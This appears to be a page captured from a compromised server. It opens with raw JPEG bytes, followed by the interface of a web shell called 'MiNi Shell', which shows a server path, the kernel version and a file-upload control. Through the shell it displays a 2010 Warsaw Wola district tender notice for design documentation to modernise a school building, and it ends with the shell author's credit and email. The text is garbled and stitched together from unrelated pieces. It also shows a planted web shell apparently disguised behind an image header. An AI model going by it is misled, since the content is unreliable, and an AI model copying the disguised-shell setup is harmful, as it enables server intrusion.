JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100324/65523-N-2010.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentacji projektowo - kosztorysowej na modernizację budynku Państwowego Studium Stenotypii i Języków Obcych przy ul. Ogrodowej 16 w Warszawie (numer sprawy 41/ZP/10)</b><br>
<b>Numer ogłoszenia: 65523 - 2010; data zamieszczenia: 24.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa, Dzielnica Wola , Al. Solidarności 90, 01-003 Warszawa, woj. mazowieckie, tel. 022 5048588, faks 022 5048592.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej na modernizację budynku Państwowego Studium Stenotypii i Języków Obcych przy ul. Ogrodowej 16 w Warszawie (numer sprawy 41/ZP/10).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej na modernizację budynku Państwowego Studium Stenotypii i Języków Obcych przy ul. Ogrodowej 16 w Warszawie wraz z uzgodnieniami wymaganymi odrębnymi przepisami.   

2.Szczegółowy opis przedmiotu zamówienia:
Informacje ogólne o obiekcie:
1) lokalizacja obiektu na działce nr 35 z obrębu nr 6-01-02 jednostka ewidencyjna 
146518-8;
2) charakterystyka obiektu to: czterokondygnacyjny podpiwniczony budynek szkoły o 	konstrukcji tradycyjnej z salą gimnastyczną o powierzchni użytkowej ca  2736m2 o 	kubaturze ca 12881 m3;
3) konstrukcja budynku to:
a)mury nośne z cegły pełnej na zaprawie cementowo - wapiennej,
b)stropy między kondygnacjami typu DMS, 
c)płyty żelbetowe (nad schodami), monolityczne zbrojone krzyżowo,
d) dach (nad salą gimnastyczną) z płyt prefabrykowanych na belkach żelbetowych, 	 żebrowany, monolityczny,
e) pokrycie dachów wykonane z papy termozgrzewalnej z posypką mineralną,
f)schody żelbetowe obłożone lastrico,
g) ściany wewnętrzne działowe z cegły pełnej i dziurawki, otynkowane, częściowo z 	 płyt pilśniowych,
h) tynki cementowo - wapienne, malowane farbami emulsyjnymi i olejnymi - 	 	 lamperie,
i) stolarka okienna drewniana częściowo wymieniona na PCV,
j) stolarka drzwiowa drewniana częściowo wymieniona na aluminiową,
4) źródła ciepła i instalacja centralnego ogrzewania to wysoko parometrowa sieć cieplna 		należąca do Stołecznego Przedsiębiorstwa Energetyki Cieplnej Warszawa S.A. 		(Instalacja ciepłej wody użytkowej oraz instalacja centralnego ogrzewania nie została 		zmodernizowana),
5) wentylacja w budynku jest grawitacyjna, wyciągowa poprzez kratki wywiewne w 		pomieszczeniach,
6)  pozostałe instalacje:
a)zimnej wody,
b)kanalizacyjną,
c)elektryczną,
d)gazową (wyłącznie lokale mieszkalne),
e)odgromową,
f)pożarową,
Przedmiot zamówienia obejmuje: 
Wykonanie pełnej dokumentacji projektowo - kosztorysowej wraz z uzyskaniem wymaganych przepisami szczegółowych opinii, uzgodnień, zatwierdzeń itp. niezbędnych do uzyskania pozwolenia na budowę i prawidłowej realizacji przedmiotu zamówienia.
Dokumentacja projektowo - kosztorysowa powinna zawierać opracowania w następujących branżach: 
1)konstrukcyjno - budowlanej;
2)cieplnej;
3)wentylacyjnej;
4)gazowej;
5)elektrycznej i elektroenergetycznej;
6)wodociągowej i kanalizacyjnej;
 	Dokumentację projektowo - kosztorysową należy opracować w następującym 	zakresie:
1)audyt energetyczny w 4 egzemplarzach;
2)inwentaryzację aktualnego stanu dla celów projektowych w zakresie niezbędnym do 	wykonania projektu budowlano - wykonawczego modernizacji w 10 egzemplarzach;
3)projekty budowlane dla wszystkich branż wraz ze szczegółowymi opiniami, 	uzgodnieniami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji 	zadania w 4 egzemplarzach;
4)projekty wykonawcze dla wszystkich branż wraz ze szczegółowymi opiniami, 	uzgodnieniami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji 	zadania w 6 egzemplarzach;
5)kosztorysy inwestorskie dla wszystkich branż w 2 egzemplarzach;
6)przedmiary robót dla wszystkich branż w 2 egzemplarzach;
7)specyfikacja techniczna wykonania i odbioru robót dla wszystkich branż i rodzajów 	robót w 4 egzemplarzach;
Dokumentacja projektowo - kosztorysowa powinna być sporządzona w formie papierowej w ilościach podanych powyżej dla poszczególnych opracowań oraz w formie elektronicznej w 2 egzemplarzach na nośniku elektronicznym CD-R, w tym:
a) dokumentację projektową, przedmiary robót  STWIOR - w formacie PDF;
b) kosztorysy inwestorskie - w programie NORMA;
Program inwestorski obejmujący dokumentację projektowo - kosztorysową należy opracować w zakresie:
1)audyt energetyczny;
2)inwentaryzacja aktualnego stanu dla celów projektowych w zakresie niezbędnym do 	wykonania projektu budowlano - wykonawczego modernizacji;
3)ocieplenie ścian zewnętrznych i fundamentów budynku szkoły i sali gimnastycznej, 	przy ociepleniu należy zastosować rozwiązania systemowe;
4)wykonanie elewacji budynku szkoły i sali gimnastycznej wraz z koloryzacją;
5)ocieplenie stropodachu budynku szkoły i sali gimnastycznej;
6)remont pokrycia dachu z wymianą obróbek blacharskich; 
7)wymiana stolarki drzwiowej i okiennej;
8)remont sali gimnastycznej i pomieszczeń szkolnych z wyminą tynków i posadzek;
9) wymiana instalacji co (nowe grzejniki, rurociągi, zawory termostatyczne itp.);
10) wykonanie instalacji ciepłej wody;
11) wykonanie przyłącza sieci cieplnej;
12) budowa węzła cieplnego w zakresie technologii i automatyki, robót budowlanych i 	 elektrycznych.
13) wykonanie wentylacji mechanicznej;
14) wymiana instalacji zimnej wody i kanalizacji;
15) wymiana instalacji przeciwpożarowej;
16) wymiana instalacji odgromowej;
17) wymiana instalacji elektrycznej w tym wymiana instalacji oświetleniowej, instalacji 	gniazd wtykowych i siłowych, tablice główne i rozdzielnie, instalacja komputerowa z 	rozprowadzeniem Internetu;
18) wykonanie instalacji monitoringu i domofonowej;
19) przystosowanie budynku dla osób niepełnosprawnych;
Inne wymagania dotyczące wykonania dokumentacji projektowo - kosztorysowej:
      1) kosztorys inwestorski powinien być wykonany zgodnie z rozporządzeniem Ministra 			Infrastruktury z dnia 18.05.2004r. (Dz. U. Nr 130 poz. 1389) w sprawie określenia 			metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych 			kosztów prac projektowych oraz planowanych kosztów robót budowlanych				określonych w programie funkcjonalno - użytkowym;
2)informację dotyczącą bezpieczeństwa i ochrony zdrowia należy wykonać zgodnie z 	rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. (Dz. U. Nr 120 poz. 	1126) w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu 	bezpieczeństwa i ochrony zdrowia; 
3)dokumentację projektową należy wykonać zgodnie z rozporządzeniem Ministra 	Infrastruktury z dnia 02.09.2004r. (Dz. U. Nr 202 poz. 2072) w sprawie 	szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej 	wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego;
4)projekty należy wykonać zgodnie z Polskimi Normami oraz obowiązującymi 	wytycznymi branżowymi; 
5)w dokumentacji projektowo - kosztorysowej należy ująć średni standard cen 	materiałów;
6)projekt budowlano - wykonawczy nie może zawierać materiałów wskazujących 	producenta, a jedynie należy podać charakterystyczne parametry tj.  rodzaj materiału;
7)zapisy w projekcie powinny dopuszczać zastosowanie materiałów różnych 	producentów;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, które będą polegać na powtórzeniu tego samego rodzaju zamówień i będą zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości: 2.000,00 zł. (słownie: dwa tysiące złotych 00/100),
w terminie do dnia 01.04.2010r. do godz 09.00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku o którym mowa w części IV.1 pkt. 1 ppkt 2) SIWZ zamawiający uzna wykazanie, iż wykonawca w okresie ostatnich trzech lat przed upływem terminu składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy- to w tym okresie, wykonał co najmniej jedną usługę polegająca na opracowaniu dokumentacji projektowo - kosztorysowej na modernizację budynku w następujących branżach: konstrukcyjno - budowlanej, cieplnej, wentylacyjnej, gazowej, elektrycznej i elektroenergetycznej, wodociągowej i kanalizacyjnej.
Spełnienie tego warunku zamawiający będzie oceniał na podstawie dokumentów i oświadczeń, o których mowa w części V.1. pkt. 4 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku o którym mowa w części IV.1. pkt. 1 ppkt 3) SIWZ zamawiający uzna wykazanie, iż wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj. posiadającymi uprawnienia budowlane do projektowania w następujących specjalnościach:
-konstrukcyjno - budowlanej w bez ograniczeń;
-instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych; cieplnych, wentylacyjnych i gazowych;
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energoelektrycznych.
Spełnienie tego warunku zamawiający będzie oceniał na podstawie dokumentów i oświadczeń, o których mowa w części V.1. pkt 5 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku o którym mowa w części IV.1. pkt 1 ppkt 4) SIWZ zamawiający uzna wykazanie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę w wysokości co najmniej 100.000,00 zł. 
Spełnienie tego warunku oceniane będzie na podstawie dokumentów i oświadczeń o których mowa w części V.1. pkt 6 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W przypadku gdy wykonawcę reprezentuje pełnomocnik - pełnomocnictwo do podpisania oferty, określające jego zakres i podpisane przez osoby upoważnione do reprezentowania wykonawcy wraz z dokumentem, z którego wynika sposób reprezentacji wykonawcy (np. odpis z właściwego rejestru).
2.W przypadku gdy ofertę składają wykonawcy występujący wspólnie wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy Prawo zamówień publicznych, podpisane przez osoby upoważnione do składania oświadczeń woli, każdego z wykonawców wspólnie ubiegając się o udzielenie zamówienia wraz z dokumentami z których wynika sposób reprezentacji wykonawców.
3.Potwierdzenie wniesienia wadium, jeżeli wadium zostało wniesione w innej formie niż pieniądz. Oryginał dokumentu w przypadku wniesienia wadium w formie niepieniężnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wola.waw.pl/page/index.php?str=422<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Stołeczne Warszawa, Dzielnica Wola, ul. Al. Solidarności 90, 01-003 Warszawa, pokój nr 220, Wydział Zamówień Publicznych dla Dzielnicy Wola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2010 godzina 09:00, miejsce: Miasto Stołeczne Warszawa, Dzielnica Wola, ul. Al. Solidarności 90, 01-003 Warszawa, pokój nr 220, Wydział Zamówień Publicznych dla Dzielnicy Wola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com